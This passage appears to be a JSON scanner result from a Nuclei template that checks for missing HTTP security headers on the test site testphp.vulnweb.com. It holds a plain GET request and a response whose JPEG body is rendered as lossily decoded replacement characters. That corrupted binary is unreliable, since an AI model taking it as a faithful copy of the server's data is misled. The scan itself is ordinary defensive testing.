Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a